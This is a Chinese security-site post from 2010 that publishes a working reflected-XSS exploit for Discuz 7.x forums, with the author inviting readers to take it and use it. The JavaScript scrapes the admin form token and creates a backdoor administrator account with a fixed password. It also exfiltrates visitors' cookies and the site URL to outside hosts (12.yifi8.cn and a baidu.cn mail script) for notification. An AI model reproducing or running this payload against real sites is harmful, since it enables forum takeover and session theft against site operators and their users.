首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
discuz 7.x xss 反射型exploit
来源:vfocus.net 作者:vfocus 发布时间:2010-08-23  
discuz 7.X 有个反射型XSS,一直都没有补,读者可以去Google一下,以下是该XSS的利用代码,用ajax添加用户并加为管理员,再发邮件通知。大家拿去玩吧。

此反射型XSS在ajax.php中,exploit如下:

var type = "Discuz 7 ";
var username_add = "blackcushion020";

var getHost = function(url) {
        var host = "null";
        if(typeof url == "undefined"
                        || null == url)
                url = window.location.href;
        var regex = /(.*)ajax.php\?(.*)/;
        var match = url.match(regex);
        if(typeof match != "undefined"
                        && null != match)
                host = match[1];
        return host;
}
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

var siteurl=getHost();
alert(siteurl);
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
xmlhttp.open("GET", siteurl+"admincp.php?action=members&operation=add", false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
if(!arr){
alert(document.cookie);
getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
}
window.onerror=function(){return true;}
var formhash=arr[1];
alert(formhash);
var post="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post);

alert("aaaaaaa");
var echo2 = xmlhttp.responseText;
//var reg2 = /blackcushion013\(UID([\w\d]+)\)/i;
//var reg2 = /用户(.*)添加成功/;
var reg2 = /blackcushion020\(UID ([\d]+)\)/i;
var arr2=reg2.exec(echo2);
var sid2=arr2[1];

var post2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post2);


getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));

    最后那句是邮件通知,phpmail.php是一个用JMAIL组件发信的PHP脚本


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·ecshop SQL注射漏洞
·新版搜狗输入法已修复多个安全漏
·请下载新版工行个人网银
·dvbbs php2.0 多个漏洞
·Microsoft IE 8 toStaticHTML()
·FreeBSD Kernel mountnfs() 漏洞
·Dedecms <= V5.6 Final模板执行
·dedecms5.3--5.6通杀执行漏洞
·dedecms v5.3-v5.6 Get Shell 0d
·FreeBSD Kernel nfs_mount漏洞分
·Windows Win32k.sys 窗口创建漏
·最新 phpcms 0day(图)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved